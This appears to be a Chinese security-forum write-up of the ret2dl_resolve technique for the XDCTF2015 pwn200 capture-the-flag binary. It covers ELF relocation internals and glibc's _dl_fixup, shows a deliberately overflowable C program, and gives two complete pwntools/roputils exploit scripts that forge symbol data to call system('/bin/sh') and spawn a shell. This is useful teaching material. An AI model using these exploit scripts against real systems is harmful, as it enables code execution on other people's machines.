看雪论坛作者ID:笔墨
typedef struct {
Elf32_Addr r_offset;
Elf32_Word r_info;
} Elf32_Rel;
#define ELF32_R_SYM(info) ((info)>>8)
#define ELF32_R_TYPE(info) ((unsigned char)(info))
#define ELF32_R_INFO(sym, type) (((sym)<<8)+(unsigned char)(type))
ELF32_R_SYM(Elf32_Rel->r_info) = (Elf32_Rel->r_info) >> 8
typedef struct
{
Elf32_Word st_name;
Elf32_Addr st_value;
Elf32_Word st_size;
unsigned char st_info;
unsigned char st_other;
Elf32_Section st_shndx;
} Elf32_Sym;
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void vuln()
{
char buf[100];
setbuf(stdin, buf);
read(0, buf, 256);
}
int main()
{
char buf[100] = "Welcome to XDCTF2015~!\n";
setbuf(stdout, buf);
write(1, buf, strlen(buf));
vuln();
return 0;
}
GOT表属于数据段,是可写的。表中存储的是指针,PLT属于代码段,其中每一项都存储了三个汇编指令
GOT[0]:存放了指向可执行文件动态段的地址
GOT[1]:存放link_map结构的地址
GOT[2]:存放了指向动态链接器_dl_runtime_resolve()函数的地址
glibc-2.23/elf/dl-runtime.c:_dl_fixup()
_dl_fixup(struct link_map *l, ElfW(Word) reloc_arg)
{
const PLTREL *const reloc = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);
result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope, version, ELF_RTYPE_CLASS_PLT, flags, NULL);
value = DL_FIXUP_MAKE_VALUE (result, sym ? (LOOKUP_VALUE_ADDRESS (result) + sym->st_value) : 0);
return elf_machine_fixup_plt (l, result, reloc, rel_addr, value);
}
rop = 'A'*offset
read@plt
pop esi; pop edi; pop ebp; ret;
0
.bss
0x64
PLT[0] addr
offset:0x0804a040+0x18-0x8048330=0x1d28
.bss=0x0804a040 (fake_stack)
rel_plt = 0x08048330
dynsym = 0x080481d8
dynstr = 0x08048278
传入的fake_stack的数据如下:
偏移:内容
0x00:"/bin/sh\x00"
0x08:"AAAAAAAA"
0x10:"AAAAAAAA"
0x18:0x0804a054
0x1c:p32(r_info)
0x20:"AAAAAAAA"
0x28:p32(st_name) p32(0x0) p32(0x0) p32(0x12)
0x38:"system"
from pwn import *
context.log_level = 'debug'
offset = 112
read_plt = 0x080483a0
ppp_ret = 0x08048619
plt0_addr = 0x08048380
bss_addr = 0x0804a040
r = process('./xdctf-pwn200')
r.recvuntil('Welcome to XDCTF2015~!\n')
payload = 'A' * offset
payload += p32(read_plt)
payload += p32(ppp_ret)
payload += p32(0)
payload += p32(bss_addr)
payload += p32(100)
payload += p32(plt0_addr)
payload += p32(0x1d28)
payload += 'A'*0x4
payload += p32(bss_addr)
r.send(payload)
cmd = "/bin/sh\x00"
payload2 = cmd
payload2 += 'A'*0x10
payload2 += p32(0x804a054)
payload2 += p32(0x1e907)
payload2 += 'A'*0x8
payload2 += p32(0x1e00)+p32(0)+p32(0)+p32(0x12)
payload2 += "system\x00"
r.send(payload2)
r.interactive()
from roputils import *
from pwn import process
from pwn import gdb
from pwn import context
context.log_level = 'debug'
binary = './xdctf-pwn200'
r = process(binary)
rop = ROP(binary)
offset = 112
bss_base = rop.section('.bss')
buf = rop.fill(offset)
buf += rop.call('read', 0, bss_base, 100)
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
r.send(buf)
buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(bss_base + 20, 'system')
r.send(buf)
r.interactive()
def align(self, addr, origin, size):
padlen = size - ((addr-origin) % size)
return (addr+padlen, padlen)
def plt(self, name=None):
if name:
return self.offset(self._plt[name])
else:
return self.offset(self._section['.plt'][0])
def dl_resolve_call(self, base, *args):
jmprel = self.dynamic('JMPREL')
relent = self.dynamic('RELENT')
addr_reloc, padlen_reloc = self.align(base, jmprel, relent)
reloc_offset = addr_reloc - jmprel
buf = self.p(self.plt())
buf += self.p(reloc_offset)
buf += self.p(self.gadget('pop', n=len(args)))
buf += self.p(args)
return buf
看雪ID:笔墨
https://bbs.pediy.com/user-589842.htm
推荐文章++++